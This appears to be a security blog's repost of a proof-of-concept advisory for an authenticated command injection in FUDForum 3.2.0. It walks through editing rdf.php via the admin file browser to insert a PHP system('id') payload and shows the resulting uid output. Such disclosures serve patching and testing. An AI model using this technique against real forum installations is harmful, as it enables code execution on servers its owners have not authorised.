Latest Tech

Latest Posts

FUDForum 3.2.0 Command Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 126
FUDForum 3.2.0 Command Injection
FUDForum 3.2.0 Command Injection
# Exploit Title: FUDForum 3.2.0 Command Injection Authenticated
# Exploit Author: # Exploit Title: FUDForum 3.2.0 Command Injection Authenticated
# Exploit Author: tmrswrr
# Vendor Homepage: http://fudforum.org/
# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.2.0.zip/download
# Version : 3.2.0


1. Log in with valid administrator credentials.
2. Click Files > File Administration System
Navigate to: https://127.0.0.1/FUDforum/adm/admbrowse.php
2. Inject Payload
3. Edit rdf.php and insert:
<?php echo system('id'); ?>
4. Save modifications.
5. Trigger Execution
Access: https://127.0.0.1/FUDforum/rdf.php
6. Verify Results
uid=1003(fud) gid=1004(fud) groups=1004(fud)

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.